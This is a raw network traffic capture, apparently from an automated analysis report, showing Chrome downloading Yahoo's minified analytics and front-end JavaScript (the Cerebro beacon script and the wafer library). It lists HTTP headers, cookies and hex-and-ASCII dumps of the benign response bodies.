                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: x0wylszdHerqb5PXBxjwFMMpWYrSlraVePLyGWAkADJDYhhAEOBABN5/Lx+VZKpcIqQr5D9ZkBoK3GpZLESYFA==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 79QB7GYYJ1WCEQ7Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 20:31:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 05 May 2022 20:34:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 5636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "0ccb51bc1dd6980920da39e008a599e0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 81747
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 76 61 72 20 57 4f 52 4b 5f 53 45 52 56 45 52 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 2d 6d 63 64 6e 2e 73 65 63 75 72 65 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 79 62 61 72 2f 65 78 70 2e 6a 73 6f 6e 22 2c 54 49 4d 45 4f 55 54 3d 32 65 33 2c 43 65 72 65 62 72 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3d 22 69 6e 64 69 76 69 64 75 61 6c 22 2c 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 3d 7b 7d 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 30 7d 72 65 74 75 72 6e 20 65 2e 72 75 6e 45 78 70 65 72 69 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e 65 77 20 65 29 2e 5f 66 65 74 63 68 57 6f 72 6b 28 29 7d 2c 65 2e 73 65 6e 64 42 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 69 73 20 30 22 29 3b 65 6c 73 65 7b 69 66 28 6e 3e 3d 65 2e 65 78 70 4c 69 73 74 2e 6c 65 6e 67 74 68 29 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 61 6c 6c 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 20 61 73 20 65 78 70 43 6f 75 6e 74 20 3e 3d 20 65 78 70 4c 69 73 74 20 6c 65 6e 67 74 68 22 29 2c 72 3d 65 2e 65 78 70 4c 69 73 74 3b 65 6c 73 65 20 69 66 28 22 72 61 6e 64 6f 6d 22 3d 3d 3d 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 22 2b 6e 2b 22 20 72 61 6e 64 6f 6d 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 22 29 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 65 2e 65 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is 0");else{if(n>=e.expList.length)console.log("marked all experiments to run as expCount >= expList length"),r=e.expList;else if("random"===t){console.log("marked "+n+" random experiments to run");for(var i=0;i<n;i++){var s=Math.floor(Math.random()*(e.ex
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 65 61 63 6f 6e 73 22 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 6e 64 42 65 61 63 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6d 3d 74 68 69 73 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 61 72 74 54 69 6d 65 3d 30 2c 74 68 69 73 2e 65 6e 64 54 69 6d 65 3d 30 2c 74 68 69 73 2e 73 6f 75 72 63 65 3d 22 64 65 66 61 75 6c 74 22 7d 2c 74 3d 30 2c 6f 3d 65 3b 74 3c 6f 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6f 5b 74 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 69 2c 73 2c 6f 2c 61 2c 75 2c 63 29 7b 76 61 72 20 6c 2c 70 2c 64 2c 66 2c 68 3b 30 3c 61 2e 6c 65 6e 67 74 68 7c 7c 30 3c 6f 2e 6c 65 6e 67 74 68 3f 28 70 3d 6e 65 77 20 6e 2c 64 3d 21 31 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eacons")}},e.prototype._sendBeacons=function(e){for(var m=this,n=function(){this.startTime=0,this.endTime=0,this.source="default"},t=0,o=e;t<o.length;t++){var r=o[t];!function(r,i,s,o,a,u,c){var l,p,d,f,h;0<a.length||0<o.length?(p=new n,d=!1,new Promise(f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 66 7c 7c 65 28 29 7d 2c 68 2e 73 74 61 72 74 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6f 2e 73 72 63 3d 72 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 7b 68 2e 65 6e 64 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 68 2e 73 6f 75 72 63 65 3d 22 69 6d 61 67 65 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 72 29 3b 6d 2e 65 78 70 43 6f 75 6e 74 3d 31 3c 65 2e 6c 65 6e 67 74 68 3f 6d 2e 65 78 70 43 6f 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: clearTimeout(t),f||e()},h.startTime=Date.now(),o.src=r}).then(function(){if("performance"in window&&"getEntriesByType"in window.performance){h.endTime=Date.now(),h.source="image";var e=window.performance.getEntriesByName(r);m.expCount=1<e.length?m.expCoun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC436INData Raw: 22 2c 6c 3d 5b 5d 2c 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2b 3d 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 2c 6c 2e 70 75 73 68 28 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 29 7d 29 2c 22 67 72 6f 75 70 22 3d 3d 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3f 28 63 20 69 6e 20 74 68 69 73 2e 70 65 6e 64 69 6e 67 7c 7c 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 3d 5b 5d 29 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 2e 70 75 73 68 28 5b 75 2c 6c 5d 29 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 2b 2b 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 3d 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ",l=[],i.forEach(function(e){c+=e.replace("<BEACON>",n),l.push(e.replace("<BEACON>",n))}),"group"==this.uploadType?(c in this.pending||(this.pending[c]=[]),this.pending[c].push([u,l]),this.complete++,this.complete==this.expCount&&Object.keys(this.pending)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              57192.168.2.45107887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC538OUTGET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: r/fH7pm+Disulv7oUJWp4jqW0h5e+ZRgrZVgvhhdLv6Gf+V9xDu+v7OSVws4Axbxi2Ovbyx+5U8=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 3T2RNY8B8N1JHWZN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 19:03:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 18 Apr 2024 01:03:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "c1fbb54c4f22838f40ce99e7418fcd97"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: VaxAIobZ0y0iWnHdR00i8Xnb9e_2JypL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 60378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 346219
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 77 61 66 65 72 3d 74 28 29 3a 65 2e 77 61 66 65 72 3d 74 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 5b 74 5d 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 6e 7d 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3a 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: le:!0,writable:!0}):e[t]=n,e}function c(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)}function u(e){return Array.isArray(e)?e:Array.from(e)}function l(e,t){if(!(e instanceof t))throw new TypeE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 20 45 7d 29 2c 6e 2e 64 28 6d 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 53 75 70 70 6f 72 74 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 54 6f 75 63 68 53 61 66 61 72 69 44 65 76 69 63 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 29 2c 6e 2e 64 28 6d 2c 22 73 6d 6f 6f 74 68 53 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 50 57 41 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 29 3b 76 61 72 20 79 3d 7b 7d 3b 6e 2e 64 28 79 2c 22 69 73 56 69 73 69 62 6c 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 29 2c 6e 2e 64 28 79 2c 22 64 65 62 6f 75 6e 63 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: E}),n.d(m,"performanceMarkSupported",function(){return T}),n.d(m,"isTouchSafariDevice",function(){return k}),n.d(m,"smoothScroll",function(){return C}),n.d(m,"isPWA",function(){return S});var y={};n.d(y,"isVisible",function(){return G}),n.d(y,"debounce",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 65 7d 29 2c 6e 2e 64 28 79 2c 22 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 65 7d 29 2c 6e 2e 64 28 79 2c 22 75 72 6c 69 66 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 65 7d 29 2c 6e 2e 64 28 79 2c 22 66 65 74 63 68 57 69 74 68 43 61 63 68 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 43 6f 6f 6b 69 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rameterValueByName",function(){return _e}),n.d(y,"setTransition",function(){return Ee}),n.d(y,"removeTransition",function(){return Te}),n.d(y,"urlify",function(){return ke}),n.d(y,"fetchWithCache",function(){return Ce}),n.d(y,"removeCookie",function(){ret
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 7d 28 29 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 65 29 72 65 74 75 72 6e 20 74 28 65 29 3b 76 61 72 20 6e 3d 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 6d 6f 7a 43 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 77 65 62 6b 69 74 43 6f 6e 6e 65 63 74 69 6f 6e 3b 69 66 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 65 66 66 65 63 74 69 76 65 54 79 70 65 3b 69 66 28 22 73 6c 6f 77 2d 32 67 22 3d 3d 3d 72 7c 7c 22 32 67 22 3d 3d 3d 72 29 72 65 74 75 72 6e 20 65 3d 21 30 2c 74 28 21 30 29 2c 21 30 7d 69 66 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype}(),E=function(){var e=void 0;return new Promise(function(t){if(void 0!==e)return t(e);var n=navigator.connection||navigator.mozConnection||navigator.webkitConnection;if(n){var r=n.effectiveType;if("slow-2g"===r||"2g"===r)return e=!0,t(!0),!0}if(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 75 72 6e 20 65 7d 2c 41 3d 5b 22 72 69 64 22 2c 22 63 72 75 6d 62 22 2c 22 73 75 62 73 63 72 75 6d 62 22 5d 2c 78 3d 7b 6f 6d 69 74 3a 31 2c 22 73 61 6d 65 2d 6f 72 69 67 69 6e 22 3a 31 2c 69 6e 63 6c 75 64 65 3a 31 7d 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 2c 74 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5b 3f 26 5d 22 2b 74 2b 22 3d 5b 5e 26 23 5d 2a 28 23 2e 2a 29 3f 24 22 29 2c 22 24 31 22 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 5b 3f 26 5d 29 22 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: urn e},A=["rid","crumb","subscrumb"],x={omit:1,"same-origin":1,include:1},L=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"",t=arguments[1];return e.replace(new RegExp("[?&]"+t+"=[^&#]*(#.*)?$"),"$1").replace(new RegExp("([?&])"+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 6d 65 64 20 6f 75 74 20 66 6f 72 20 74 69 6d 65 6f 75 74 20 76 61 6c 75 65 20 22 2b 45 2b 22 20 68 61 76 69 6e 67 20 73 74 61 72 74 54 69 6d 65 20 22 2b 61 2b 22 20 61 6e 64 20 65 6e 64 54 69 6d 65 20 22 2b 65 29 29 7d 2c 45 29 3b 54 3d 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 22 63 61 63 68 65 46 69 72 73 74 22 3d 3d 3d 73 3f 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 2e 67 65 74 28 6f 2c 22 66 65 74 63 68 22 2c 7b 74 69 6d 65 6f 75 74 3a 31 65 33 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 6e 3d 65 2e 74 74 6c 2c 72 3d 65 2e 76 61 6c 75 65 2c 69 3d 65 2e 63 61 63 68 65 64 54 69 6d 65 2c 6f 3d 28 44 61 74 65 2e 6e 6f 77 28 29 2d 69 29 2f 31 65 33 3b 74 72 79 7b 5f 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: med out for timeout value "+E+" having startTime "+a+" and endTime "+e))},E);T=m&&window.wafer.db&&"cacheFirst"===s?window.wafer.db.get(o,"fetch",{timeout:1e3}).then(function(e){if(e){var n=e.ttl,r=e.value,i=e.cachedTime,o=(Date.now()-i)/1e3;try{_=JSON.pa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 4f 28 7b 7d 2c 65 2c 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 7d 29 7d 69 66 28 32 30 30 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 3b 69 66 28 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 75 26 26 69 26 26 69 2e 6d 61 74 63 68 28 2f 61 70 70 6c 69 63 61 74 69 6f 6e 5c 2f 6a 73 6f 6e 2f 69 29 29 7b 76 61 72 20 73 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 65 2e 63 6c 6f 6e 65 28 29 2e 74 65 78 74 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .then(function(e){t(O({},e,{_fetchMeta:r}))}).catch(function(){t({_fetchMeta:r})})}if(200===n){var i=e.headers.get("Content-Type");if(m&&window.wafer.db&&u&&i&&i.match(/application\/json/i)){var s=Date.now();e.clone().text().then(function(e){return window
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 44 61 74 65 2e 6e 6f 77 28 29 2d 61 2c 73 6f 75 72 63 65 3a 63 3c 69 3f 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 22 3a 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 5f 53 54 41 4c 45 22 7d 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 65 6c 73 65 20 72 28 65 29 7d 29 7d 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 72 3d 6e 2e 63 73 73 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 5b 5d 3a 72 3b 72 65 74 75 72 6e 20 69 3f 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 69 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ta:{duration:Date.now()-a,source:c<i?"CACHE_SECOND_ATTEMPT":"CACHE_SECOND_ATTEMPT_STALE"}}))}).catch(function(e){r(e)})}else r(e)})}})}).then(function(e){var t=e.assets,n=void 0===t?{}:t,r=n.css,i=void 0===r?[]:r;return i?Promise.all(i.map(function(e){var
